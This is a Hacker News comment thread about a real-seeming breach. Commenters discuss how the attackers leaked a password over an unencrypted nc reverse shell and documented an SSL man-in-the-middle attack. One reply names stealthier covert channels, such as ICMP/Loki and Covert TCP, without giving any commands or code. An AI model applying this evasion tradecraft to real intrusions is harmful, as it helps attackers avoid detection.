Hacker News new | ask | show | jobs
by kaivi 1577 days ago
Cool story, that does indeed sound like a plot out of a movie!

How were you able to extract a password from just listening to scp (ssh really) traffic though? Also, how did you know that someone's entire network was SSL MITM'd, only by looking at the data they dumped? Did the hackers store a readme file along with every dump?
1 comments
isthrowaway 1577 days ago
The traffic containing the clear text password was not scp, it was the reverse shell they sent themselves. Reverse shells are unencrypted on the wire, and when scp prompted for the password, they typed it in over their reverse shell. A significant oversight on their part. If it was a team, it must have been a less experienced member who made that mistake.

As far as the SSL MITM goes, they indeed documented their attack with various files containing notes in English. They had a separate directory (within the target's folder) containing the certificates they were using in the attack.

link
kaivi 1577 days ago
Can't help but imagine your www-data which spawned nc, and it seems too amateurish for a high profile hacker group. Makes it seem as if they've copy-pasted the first one-liner reverse shell found on Google. Even the Metasploit framework has introduced payloads a while ago which do traffic encryption/obfuscation. Much more subtle reverse shells are used in the wild, where a compromised machine reaches out to hacker's server once in a while and receives commands and dumps output, even over something like ICMP/Loki or Covert TCP.
link